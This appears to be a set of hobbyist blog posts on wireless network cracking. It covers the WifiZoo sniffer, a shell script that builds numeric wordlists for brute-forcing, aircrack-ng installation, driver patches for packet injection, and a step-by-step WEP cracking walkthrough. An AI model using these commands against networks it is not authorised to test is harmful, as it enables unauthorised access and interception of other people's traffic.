Your Access Point being sniff?

As I wondering just how easy someone could break into your protected WEP Access Point(dont use WEP), so i google more in order to look for other application that is fun to play with. And suddenly I stop at one page called WifiZoo.

What is it ?

Well - WifiZoo is tools to gather Wifi information from AP to client details. It could gather all the information about the bssid and eesid also the client connected to it. So to be simple, WifiZoo is quite similar to Airodump-ng. It could gather all sort of information and turn it into .cap files.

Right now, some of the folks on BackTrack currently developing the current wifizoo to intergrate with aircrack and working as info gathering. It'll be a great combination if this tools come in bundle with aircrack.

Capabillitites

Well this WifiZoo could well integrate with kismet to do channel hopping. Default wifizoo can't do channel hop but could easily do the hopping with kismet helps:

• run kismet
• run wifizoo
• wait - it'll work

It can also do channelhop, channelvelocity, channeldwell, defaultchannels and sourcechannels. You just have to edit configuration in kismet.

Requirements

• It need python
• It need scrappy
• and kismet if you want to do channel hopping.

So it's not secure anymore to use wireless connection to do online banking or even chat with your friends about any personal issue cause you will never know who's listening to your conversation.
Maybe next morning, you'll read your own conversation on the net as soon as you woke up.

Update: Numbers Combination Creator

I did make a post about my script to generate numbers combination depends on user input to set the number of digits a few weeks ago. And I was thinking to make it more clean and user friendly after received a comments from "Pak Leman".

So here is the update of the scripts. The script will asked user to input the digits of combination to generate. And will asked user to give the output filename. So no more "sh script 8 > huhu.txt" . To run the script just run "sh script" and it will ask you all the details using script.

So here is the full codes of the script, and also pictures of the output:

#!/bin/sh
echo "Please give the digits for combinations[8-63]: \c"
read digit
echo "Please type the output file name: \c"
read OUTFILE

FINISH=`expr "10^"$digit"" | bc -l`

if [ $digit -lt 8 -o $digit -gt 64 ]
then
clear
echo "The digit you specify is ' $digit '. "
echo "Please enter a valid digit [8-63]: \c"
read digit
else
break
fi

COUNT="-1"
while [ $COUNT != `expr $FINISH - 1` ] ; do
COUNT=`expr $COUNT + 1`
printf "%+"$digit"s\n" $COUNT | sed s^\ ^0^g >> $OUTFILE
done

So any opinion on how to improve the script are most welcome. Somehow the script still allow digits more than 63. Still looking forward to repair this script. Any thought or advise are welcome. Please drop some comments.

UBUNTU: SVN aircrack version (1.0 Beta 2)

Sorry for the late follow up on my previous tutorial about aircrack. Life been busy with some programming work and also web designing at my practical company. So here is a quick guide on how to install new version of Aircrack 1.0 beta 2 for ubuntu users.

sudo apt-get install subversion
svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng

Now to install the aircrack:

cd aircrack-ng/trunks
make
sudo make install

So this will install the new aircrack to work with latest SuD patch. Some will have errors after applying SuD patch to run Aircrack 0.9.3 on ubuntu. So here is the solution.

As far as I've been using this, still got no problem with the patch nor the aircrack itself. Here is some review I post previously on running aircrack with bcm43xx.

So I assume that this SuD patch is a stable patch for bcm43xx running under Aircrack 1.0 beta 2. Thanks to SuD for the patch, and please leave a comments if any left out in steps given.

Script to generate Numbers Combination

This is a script to generate combinations of numbers from 0-9 depends on how many digits you specify when running the scripts. It's a simple script that took me 5 minutes to write. Plus I got the idea of writing this script from one of my friend.

This script is useful for those who wants to generate a wordlist for bruteforce. Here is the scripts:

#!/bin/sh
# Usage:
# sh [script name] [digits specify] > [output file] &
digit=$1
FINISH=`expr "10^"$digit"" | bc -l`
COUNT="-1"
while [ $COUNT != $FINISH ] ; do
    COUNT=`expr $COUNT + 1`
    printf "%+"$digit"s\n" $COUNT | sed s^\ ^0^g
done

Why do I only write scripts for numbers combination? The answer is simple, if I wrote a script that will create a combination of all ascii letters, then it will be too much for a single machine to generate and also will took you a long long time to generate.

If you want to calculate how much time it will take to generate a combination of digits with quantity of letters(ascii) then you can do calculation on this website, Generator Calculator.

Look at the time needed to generate a full ascii password list. It's not worth your time to do that. If you ever need a full ascii generator, than you can download it right here.

* The script will be update soon to be more user friendly.

How to setup Edimax 7318USg

After do some research and lurking on every forum on the net, finally I come to one page which is I think the most suitable answer for those who have Edimax 7318USg card to make it able to do injection using "aireplay-ng".

Here is the solution:

• first install a new beta version of aircrack-ng from this site. [ Aircrack 1.0 beta 2 ]
• I assume you know how to compile the aircrack-ng from source since you are attempting to do the crack, if not then just delete the aircrack-ng source and go to google to read more on linux basic skills ~:P
• Then remove the current rt2500 or rt73 driver on your machine.
• Then install the adequate driver. [ rt73 adequate driver ]
  
• And this time i assume you do know how to install a driver. (extract, make, make install, modprobe)
  
• put the card in monitor mode by using "airmon-ng start [interface]"
• and play the aircracks

Suppose you are good to go with some packets capturing and injection. But if somehow you lost and cant figure out on how to remove the current driver, here is the way to cleanly remove old driver(cause sometime, default driver do interfere with the driver you install to inject):

• airdriver-ng remove 25
• airdriver-ng remove 31
• this will remove the current rt2500 and rt73 driver from your system.

So I hope this will make your card fully compatible with injection procedure. But there is some note to take.

Note:

• "aireplay-ng -1" wont work before you do "aireplay-ng -9"
• run aireplay-ng -9 -a [BSSID] -B rausb0 to get the valid rate for rausb0. When get the rate set it to your rausb0 by using "iwconfig rausb0 rate yMB" where 'y' is the rate receive earlier on aireplay.

This tutorial is especially dedicated to one of friends 'srand' on irc. Please give the result if you tried this method on your rausb0 card. I would like to know the result if any error occurs.

Patch for iwl4965 testing version

Hello, for those who like to test the aircrack, kismet or any other wifi cracking application need to turun card into monitor mode. As far as I know, iwl4965 is a new chip set from intel, and no patch yet on the net to enable iwl4965 to do packets injection.

So I google aroudn and found out, that there is someone able to do injections using iwl4965 wifi cards and luckily he share the patch for others to give it a try. For those who is interested on playing with Wireless AP, then you can download the patch for iwl4965 from patch iwl4965.

To apply the patch, just do "patch -i [patch filename]" and patch it on kernel source. After that, you need to recompile the modules and copy the new module into your current module directory in order the new patch to work.

more over, if you need some information on the patch, please read the forum discussion about iwl4965 injection here.

Aircrack-ng review on bcm43xx

This post took me 2 days to make it ready. So here is the exact way on how do i crack the WEP in just about 20 mins.

It took 3 steps to make it ready before we can crack the wireless. First you need to know is how does WEP works. You can read about WEP here. So to make it possible to crack using aircrack-ng for bcm43xx, you need to patch your card. I post earlier a how-to patch bcm43xx in this post.

So here is four steps:

• sudo airmon-ng [start|stop|check] [wireless interface] [channel]
  
• sudo airodump [interface] [option] -w [prefix for output file]
  
• sudo aireplay -1 0 -a [target mac] -h [your wireless mac] [interface]
• sudo aireplay -3 -b [target mac] -h [your wireless mac] [interface]

Now wait until airodump capture enough packets (around 1300000+ ) is just enough to crack wep key using aircrack. Once you have finished capturing ivs , now it is time to do the crack.

• sudo aircrack-ng [.cap files]

You can add more option depends on the wep key, for more info about option please refer to the manual page of the command.